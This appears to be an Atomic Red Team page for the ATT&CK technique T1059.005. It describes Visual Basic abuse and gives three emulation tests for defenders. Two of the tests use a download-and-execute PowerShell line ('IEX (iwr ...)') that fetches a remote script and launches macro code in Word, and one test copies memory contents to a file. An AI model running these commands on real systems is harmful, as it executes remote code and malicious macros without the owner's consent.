T1059.005 - Command and Scripting Interpreter: Visual Basic

Description from ATT&CK

Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking )

Atomic Tests


Atomic Test #1 - Visual Basic script execution to gather local computer information

Visual Basic execution test, execute vbscript via PowerShell.

When successful, system information will be written to $env:TEMP\T1059.005.out.txt.

Supported Platforms: Windows

auto_generated_guid: 1620de42-160a-4fe5-bbaf-d3fef0181ce9

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | vbscript | Path to sample script | string | PathToAtomicsFolder\T1059.005\src\sys_info.vbs|

Attack Commands: Run with 
1

powershell
!

1

cscript "#{vbscript}" > $env:TEMP\T1059.005.out.txt

Cleanup Commands:

1

Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore

Dependencies: Run with 
1

powershell
!

Description: Sample script must exist on disk at specified location (#{vbscript})
Check Prereq Commands:
1

if (Test-Path "#{vbscript}") {exit 0} else {exit 1}
Get Prereq Commands:
1
2

New-Item -ItemType Directory (Split-Path "#{vbscript}") -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}"



Atomic Test #2 - Encoded VBS code execution

This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution a message box will pop up displaying “ART T1059.005”

A note regarding this module, due to the way that this module utilizes “ScriptControl” a 64bit version of Microsoft Office is required. You can validate this by opening WinWord -> File -> Account -> About Word

Supported Platforms: Windows

auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa

Attack Commands: Run with 
1

powershell
!

1
2
3

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"

Cleanup Commands:

1

Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"}  | % { "$(Stop-Process $_.ProcessID)" } | Out-Null

Dependencies: Run with 
1

powershell
!

Description: The 64-bit version of Microsoft Office must be installed
Check Prereq Commands:
1
2
3
4
5
6

try {
  $wdApp = New-Object -COMObject "Word.Application"
  $path = $wdApp.Path
  Stop-Process -Name "winword"
  if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
} catch { exit 1 }
Get Prereq Commands:
1

Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"



Atomic Test #3 - Extract Memory via VBA

This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin.

Supported Platforms: Windows

auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | ms_product | Maldoc application Word | string | Word|

Attack Commands: Run with 
1

powershell
!

1
2
3

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"

Cleanup Commands:

1

Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore

Dependencies: Run with 
1

powershell
!

Description: Microsoft #{ms_product} must be installed
Check Prereq Commands:
1
2
3
4
5
6

try {
  New-Object -COMObject "#{ms_product}.Application" | Out-Null
  $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }
Get Prereq Commands:
1

Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"